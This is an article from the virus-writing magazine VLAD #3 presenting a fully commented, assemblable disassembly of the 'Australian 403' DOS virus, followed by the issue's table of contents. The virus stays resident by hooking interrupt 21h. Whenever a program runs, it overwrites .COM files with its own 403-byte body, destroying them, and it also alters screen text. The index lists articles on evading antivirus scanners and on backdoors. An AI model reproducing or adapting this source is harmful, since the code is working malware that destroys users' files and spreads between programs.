Virus Labs & Distribution
VLAD #3 - Aust403 Disasm


;                             Darkman/VLAD
;                           Proudly Presents
;                    Disassembly of Australian 403


aussie403    segment
             assume  cs:aussie403,ds:aussie403,es:aussie403
             org     100h                ; Origin of COM-file

code:
             jmp     resident
stackptr     dw      ?                   ; Stack pointer
stackseg     dw      ?                   ; Stack segment
accumulator  dw      ?                   ; Accumulator register
message      db      00h,0dh,0ah         
             db      'ScUD 1991!'        ; Message by the author
             db      0dh,0ah
stackbytes   db      41h dup(?)          ; Stack
int21off     dw      ?                   ; Offset of interrupt 21h
int21seg     dw      ?                   ; Segment of interrupt 21h
filespec     db      '*.COM',00h         ; File specification
filehandle   dw      ?                   ; File handle

dta:                                     ; Disk transfer area (DTA)
drive        db      ?                   ; Drive letter
searchtemp   db      0bh dup(?)          ; Search template
reserved     db      09h dup (?)         ; Reserved
fileattr     dw      ?                   ; File attribute
filetime     db      ?                   ; File time
filedate     dw      ?                   ; File date
filesize     dd      ?                   ; Filesize
filename     db      0dh dup (?)         ; Filename + extension

fill         db      04h dup (?)         ; Fill of virus

virusint21   proc    near                ; Interrupt 21h of Australian 403
             mov     cs:stackptr,sp      ; Save stack pointer
             mov     cs:stackseg,ss      ; Save stack segment
             mov     cs:accumulator,ax   ; Save accumulator register
             lea     sp,message          ; SP = offset of message
             nop
             add     sp,4eh

             mov     ax,cs
             mov     ss,ax
             mov     ax,cs:accumulator   ; Load accumulator register
             cmp     ah,4bh              ; Load or execute a program?
             je      service4b           ; Equal? Jump to service4b
             jmp     virusexit
service4b:
             push    ax                  ; Save AX at stack
             push    bx                  ; Save BX at stack
             push    cx                  ; Save CX at stack
             push    dx                  ; Save DX at stack
             push    ds                  ; Save DS at stack
             push    es                  ; Save ES at stack
             push    si                  ; Save SI at stack
             push    di                  ; Save DI at stack

             mov     ax,0b800h
             mov     ds,ax               ; DS = text color screen segment
             mov     bx,00h
chkscreen:
             mov     al,[bx]             ; Read from screen
             cmp     al,'0'              ; Zero?
             jne     fuckscreen          ; Not equal? Jump to fuckscreen
             mov     al,'O'              ; Convert zeros to O's
fuckscreen:
             mov     [bx],al             ; Write to screen
             inc     bx                  ; Increase BX
             inc     bx                  ; Increase BX
             cmp     bx,1000h            ; End of screen?
             jne     chkscreen           ; Not equal? Jump to chkscreen

             mov     ax,cs
             mov     ds,ax
             lea     dx,dta              ; DX = offset of dta
             mov     ah,1ah              ; Set disk transfer area
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off

             mov     ax,cs
             mov     ds,ax
             lea     dx,filespec         ; DX = offset of filespec
             mov     cx,00h              ; Set file attribute
             mov     ah,4eh              ; Find first matching file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             jc      infectexit          ; Error? Jump to infectexit

             cmp     word ptr [offset filesize],0193h
             jne     infect              ; Not infected? Jump to infect
findnext:
             mov     ah,4fh              ; Find next matching file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             jc      infectexit          ; Error? Jump to infectexit

             cmp     word ptr [offset filesize],0193h
             jne     infect              ; Not infected? Jump to infect
             jmp     short findnext
infect:
             mov     ax,cs
             mov     ds,ax
             lea     dx,filename         ; DX = offset of filename
             mov     ah,3ch              ; Create a file
             mov     cx,00h              ; Set file attribute
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             mov     filehandle,ax       ; Save file handle

             mov     ax,cs
             mov     ds,ax
             mov     bx,filehandle       ; Load file handle
             mov     cx,(codeend-code)   ; Write 403 bytes
             lea     dx,code             ; DX = offset of code
             mov     ah,40h              ; Write to file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off

             mov     bx,filehandle       ; Load file handle
             mov     ah,3eh              ; Close file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
infectexit:
             pop     di                  ; Load DI from stack
             pop     si                  ; Load SI from stack
             pop     es                  ; Load ES from stack
             pop     ds                  ; Load DS from stack
             pop     dx                  ; Load DX from stack
             pop     cx                  ; Load CX from stack
             pop     bx                  ; Load BX from stack
             pop     ax                  ; Load AX from stack
virusexit:
             mov     sp,cs:stackptr      ; Load stack pointer
             mov     ax,cs:stackseg
             mov     ss,ax               ; Load stack segment
             mov     ax,cs:accumulator   ; Load accumulator register
             jmp     dword ptr cs:int21off
             endp

resident:
             mov     ax,cs
             mov     ds,ax
             mov     es,ax
             mov     ss,ax

             mov     ax,3521h            ; Get address of interrupt 21h
             int     21h                 ; Do it!
             mov     int21off,bx         ; Save offset of interrupt 21h
             mov     int21seg,es         ; Save segment of interrupt 21h

             mov     ax,cs
             mov     ds,ax
             mov     ax,2521h            ; Set address of interrupt 21h
             lea     dx,virusint21       ; DX = offset of virusint21
             int     21h                 ; Do it!

             mov     dx,293h             ; Reserve 672 bytes of memory
             int     27h                 ; Terminate but stay resident
codeend:

aussie403    ends
end          code


- VLAD #3 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

The Press
ARTICLE.2_2       Fooling TBScan
ARTICLE.2_3       Backdoors
ARTICLE.2_4       Tracing Int21
ARTICLE.2_5       Replication
ARTICLE.2_6       VSUM denial
ARTICLE.2_7       Proview

ARTICLE.3_1      

TBTSR Checking
ARTICLE.3_2       TBScan Flags
ARTICLE.3_3       HD Port Reading
ARTICLE.3_4       HD Port Writing
ARTICLE.3_5       TBAV Monitor
ARTICLE.3_6       Micro128 Disasm
ARTICLE.3_7       Aust403 Disasm

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       Hemlock
ARTICLE.4_3       Antipode
ARTICLE.4_4       Insert
ARTICLE.4_5       VLAD-DIR
ARTICLE.4_6       Quantum Magick
ARTICLE.4_7       Mon Ami La Pendule

ARTICLE.5_1      

Monkeys
ARTICLE.5_2       Small Virus
ARTICLE.5_3       Catch-22
ARTICLE.5_4       ART Engine
ARTICLE.5_5       Megastealth
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main